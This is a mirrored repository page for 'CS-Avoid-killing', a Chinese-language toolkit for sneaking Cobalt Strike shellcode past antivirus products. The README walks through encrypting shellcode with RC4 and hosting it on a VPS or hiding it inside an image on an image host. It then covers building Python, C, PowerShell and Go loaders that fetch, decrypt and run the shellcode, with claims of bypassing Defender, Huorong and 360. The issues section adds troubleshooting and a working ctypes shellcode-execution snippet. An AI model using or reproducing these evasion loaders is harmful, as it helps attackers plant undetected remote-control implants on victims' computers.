Giter VIP home page Giter VIP logo

cs-loader's Introduction

CS-Avoid-killing

CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常

V1.0: 目前测试可以过Defender/火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试

下一步开发计划:

V1.5: 加入C版本CS免杀(已完成)

V1.7:加入Powershell的免杀(已完成)

V2.0:开发出UI界面

V2.0: 开发成在线免杀平台(已完成)

PS: 在实际使用中发现图形化界面不利于和其他工具结合,相比之下命令行的方式更具有扩展性

关于自己写的在线免杀平台,暂不考虑开源,主要是觉得目前的技术还比较薄弱,如果有师傅想体验可以联系我

V3.0: 想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样)

  • V3.1 增加了go版本(可过火绒/360/defender)

依赖环境

python:

  • python2
  • pyinstaller
  • requests

C: VS2019默认就够了

Powershell: Win10上测试没有问题,也就是ps5.1,更低版本未测试

go: go

安装

git clone https://github.com/Gality369/CS-Avoid-killing.git

使用

  1. 先通过CS生成C格式的shellcode:Attacks -> packages -> Payload Generator选择一个listener然后生成一个C的shellcode(其实就是二进制代码)

  2. Python版:

    1. 将生成的shellcode填入generator.py的shellcode变量中,填入一个Key,用于后续的RC4加密
    2. 运行generator.py,生成的payload自动保存在payload.txt中.
    3. 将payload.txt上传到你的VPS中,后续生成的加载器会从VPS中获取加密shellcode并在本地解密后执行
    4. 将在VPS上的payload路径填入PyLoader.py的url变量中,填入你刚刚设置的Key
    5. python pyinstaller.py -F -w PyLoader.py打包文件,可执行文件在pyshellcode文件夹下的dist中,双击运行可以看到主机上线

  3. C版本:

    1. 按要求填入你自己的Key,shellcdoe长度和shellcode,执行
    2. 将第一行的数字复制进Loader的Base64ShellLen字段中,将第二行生成的加密shellcode保存在payload.txt文件中并将其放在服务器上(~~如果不叫这名或者不在跟路径,需要自己改char request[1024] = "GET /RC4Payload32.txt HTTP/1.1\r\nHost:";中的路径) 在path中填入可以访问到payload的路径即可(Ex: /test/payload.txt)
    3. 在Loader中填入自己的Key和VPS的IP,编译
    4. 执行编译出的exe,CS上线

  4. Powershell版本:

    1. 在CS中生成Powershell版本的payload.ps1
    2. Python3 PSconfusion.py payload.ps1 AVpayload.ps1
    3. 经测试能过目前所有杀软的静杀,动杀的话,由于CS中有些模块不免杀,所以加载这些模块时可能会触发动杀,这个以后再研究怎么绕过

  5. go版本:

    1. 将一张不要太大的图片放入同一文件夹下
    2. 将生成的shellcode填入generator.py的shellcode变量中, 执行python generator YourRC4key ImageName ,生成的shellcode会自动追加到图片末尾
    3. 将图片上传至图床(找那种不会压缩的图床,保证shellcode不会被删掉)
    4. 将图片url和你的RC4key填入CS-Loader.go的相应位置
    5. 使用命令go build -ldflags="-H windowsgui" CS-Loader.go生成exe,可以用upx压缩下
    6. 执行exe,CS上线

注意

  1. pyinstaller安装细节

    最后一个支持python2的版本是3.6(最新版pyinstall不再支持python2)

    网址:https://github.com/pyinstaller/pyinstaller/releases

    需要安装pywin32:https://github.com/mhammond/pywin32

  2. 目标是什么环境就在什么环境上打包,否则可能会出现无法上线的情况,不推荐使用py3对项目进行改造,ctypes对py3的支持不太好,会有些莫名其妙的bug 感谢KingSF5师傅对python3版本的修复(崇拜~)

  3. 经过测试,C版本在X86Debug模式编译下无任何问题,Release模式下会存在莫名bug,在某些电脑上无法正常上线,请根据需求自行测试

  4. 编译选项不要选择动态编译,否则可能会因为目标靶机上缺少相应dll而无法运行.

  5. 加载ps脚本的方式这里不做讨论,有师傅已经总结的非常好了,请自行百度

  6. go版本build前建议先set GOARCH=amd64,同时使用64位的shellcode,32位打包出来的程序会报一个在ntdll中找不到函数的错误,曾有人提问过:https://stackoverflow.com/questions/58649055/failed-to-find-rtlcopymemory-procedure-in-ntdll-dll-only-when-goarch-386

cs-loader's People

Contributors

gality369 avatar kingsf5 avatar yumusb avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

nkingpp bravery9 gitttttbottttt b1gd0g xysxya safe6sec 0ps 5keeter ascokruubfb pyking whitesharks djiangliu sexisnull popmedd nicolas-yuan liutufang twys1018 1821196864 yyming-sudo xundididi pa55w0rd chkfail sp4zcmd ceshi897 axax002 icysun exi1sh0w dskho msf-ntdll sslvtao yumusb sry309 okm404 selfevo rakjong wintermoon99 deepwebhacker forever-sky r4c0box hhhhelix gysf666 redwifiteam k1p2y3 xiaobei97 rixo1043 bay1ts laowang1026 k3rwin sec-nux owwwo h3110w0r1d-y conanjun kkin77 xunbu7 xiaoaliha maxsecurity kangd1w2 crackercat ios1024 9018 bigbrobro re-expoc aaasssqqqz fengchenzxc kingsf5 phuong39 ls-wen eniac888 wumingzhilian strugg1e f1r4s is101101 mytfx ruanzy506 bearowang icukeup prettyrecon dk47os3r jeromeyoung wisejayer tiaotiao97 supejkj libaizaishuijiao michaelcandoo douglas88 0x00finch stemmm howfan hittergo fzpixzj90h7baqieoop5hg greenberglinken david5un casping transferhhh myrhcn werwolfz evi1hack xiaoshishu2 underwood12 tttttint

cs-loader's Issues

go版本无法上线

go version go1.15.5 darwin/amd64

CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-H windowsgui" CS-Loader.go

cs 4.1,生成的c
image

图片用010editor确实有shellcode
image
有下载图片请求,但是没有上线
image

函数参数错误

cpp版本主函数中VirtualAlloc、RtlMoveMemory函数参数错误。1024 应该为--> Base64ShellLen。

Failed to execute script Pyloader

python27环境 + pyinstaller3.6 + pywin32-py2.7的环境
1.将cs中生成的shellcode.c中即buf[]的内容粘贴到 generator.py的shellcode变量中,输入rc4密钥,生成payload.txt
2.放入到pyinstaller目录下执行python pyinstaller.py -F -w PyLoader.py
3.直接在编译本机点击dist目录下的PyLoader.exe,结果cs没有上线,并且弹框报Failed to execute script Pyloader的错误;
请问师傅是什么原因呢!

c版cs无法上线

在服务器上可以看到有get payload.txt的请求,但无法上线
image
evil.cpp关键配置:
image
generator关键配置:
image
image
image
都是在win10 debug模式下编译

tg联系下

能联系一下吗 做项目 就是免杀而已

无法上线

师傅是否可以写的详细一点,按照您的来操作无法上线

python3打包成功,运行exe报错

运行exe报错信息如下:
Traceback (most recent call last):
File "base64.py", line 37, in _bytes_from_decode_data
UnicodeEncodeError: 'ascii' codec can't encode character '\x85' in position 4: ordinal not in range(128)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "PyLoader.py", line 51, in
File "base64.py", line 80, in b64decode
File "base64.py", line 39, in _bytes_from_decode_data
ValueError: string argument should contain only ASCII characters

Python 3.8-不通过

生成的时候需要在shellcode字符串上前加个b"--shellcode--"

执行的时候报错:

code = bytearray(base64.b64decode(code))--line:47

ValueError: string argument should contain only ASCII characters

解决python3 ctypes类问题

'''
修复ctypes问题
'''
windll.kernel32.VirtualAlloc.restype = c_void_p
windll.kernel32.RtlCopyMemory.argtypes = (c_void_p, c_void_p, c_size_t)

VirtualAlloc = windll.kernel32.VirtualAlloc
VirtualProtect = windll.kernel32.VirtualProtect
useless += random.choice(useless)
whnd = windll.kernel32.GetConsoleWindow()
RtlMoveMemory = windll.kernel32.RtlMoveMemory
memHscode = VirtualAlloc(c_int(0), c_int(len(code)), c_int(0x3000), c_int(0x40))
buf = (c_char * len(code)).from_buffer(code)
useless += random.choice(useless)[:-1]
RtlMoveMemory(c_void_p(memHscode), buf, c_int(len(code)))
runcode = cast(memHscode, CFUNCTYPE(c_void_p))
runcode()

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.